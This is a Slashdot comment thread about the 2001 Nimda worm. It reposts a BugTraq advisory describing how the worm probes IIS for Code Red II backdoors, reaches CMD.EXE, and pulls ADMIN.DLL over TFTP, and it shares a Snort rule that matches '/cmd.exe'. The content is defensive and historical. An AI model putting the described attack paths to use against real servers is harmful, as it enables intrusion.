Perianwyr Stormcrow (157913) | more than 12 years ago | (#2314852)

Declaring "cyberwar" on Afghanistan is a lot like threatening to blow up Kabul's world trade center.

Oh, they don't have one? Exactly.

I'd imagine most "cyberwar" would focus on Pakistan, but they're helping us already.

Info FromRuss at BugTraq (5, Interesting)

Anonymous Coward | more than 12 years ago | (#2314833)

-----BEGIN PGP SIGNED MESSAGE-----

There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the network.

A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMM DU ChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJ Uu pDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQja mK I2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----

From what department? (0, Troll)

EI-AOB (227589) | more than 12 years ago | (#2314842)

from the what-a-pain-in-the-arse dept.

Arse? When did you move to England (or Ireland), Rob?

Damn it! (4, Interesting)

Reality Master 101 (179095) | more than 12 years ago | (#2314848)

Just when I was hoping my cable company would unblock my HTTP port (which they said was "temporary"). Unfortunately, this will give them more fuel to make it permanent.

The HTTP port doesn't bug me as much as they have also blocked my mail port.

Question for sendmail experts out there, related to this: I'm currently using another system to tunnel my mail to my box on my cable modem. It works great, but a side effect is that it looks like all mail is coming from "localhost", which defeats the anti-Spam measures. Of course, it didn't take long for the cockroaches to find my mail server and use it for relaying. I've been fighting it by blocking specific subnets, but it's an annoying battle. Any suggestions?

Snort rule (3, Informative)

AftanGustur (7715) | more than 12 years ago | (#2314851)


Add this to your in-house SnortRules file.

alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)

They're very _active_ aren't they... (2, Informative)

FreeMars (20478) | more than 12 years ago | (#2314854)

Those machines must have a lot of probe threads running -- I got hit by a site at 8:47 and again at 10:25. (Or else the random number generator in the worm is bad.)

My DSL to home is completely swamped ... I can't even get a ping through.

Apache too? (1)

DarkWarriorSS (518859) | more than 12 years ago | (#2314857)

I noticed the same thing in my web log this morning. I think it not only affects IIS, but I think it will also affect Apache servers running Micro$oft FP Extensions, as the /scripts/ and stuff its pointing to are all apart of the extensions. IT does also try to exec. some windoze only files. But personally, its gonna be bigger then we all think it will be...
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...